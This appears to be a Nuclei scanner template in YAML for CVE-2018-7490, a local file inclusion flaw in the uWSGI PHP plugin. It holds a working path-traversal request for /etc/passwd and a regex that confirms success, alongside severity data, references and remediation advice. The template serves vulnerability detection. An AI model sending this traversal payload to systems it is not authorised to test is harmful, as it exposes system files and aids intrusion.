46 lines
1.5 KiB
YAML
46 lines
1.5 KiB
YAML
id: CVE-2018-7490
|
|
|
|
info:
|
|
name: uWSGI PHP Plugin Local File Inclusion
|
|
author: madrobot
|
|
severity: high
|
|
description: uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.
|
|
remediation: |
|
|
Update to the latest version of uWSGI PHP Plugin or apply the necessary patches to fix the local file inclusion vulnerability.
|
|
reference:
|
|
- https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
|
|
- https://www.exploit-db.com/exploits/44223/
|
|
- https://www.debian.org/security/2018/dsa-4142
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7490
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-7490
|
|
cwe-id: CWE-22
|
|
epss-score: 0.96541
|
|
epss-percentile: 0.99467
|
|
cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: unbit
|
|
product: uwsgi
|
|
tags: cve,cve2018,uwsgi,php,lfi,plugin,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a0047304502200d972d1899f0eb800980a61addf45f1a4eb57b68b558bfb396d54e962dad1d7d0221009c6264ff26c9af5bfaff8b55443d1d6fd496d16bfe81ff098b0d1e266e7708ef:922c64590222798bb761d5b6d8e72950
|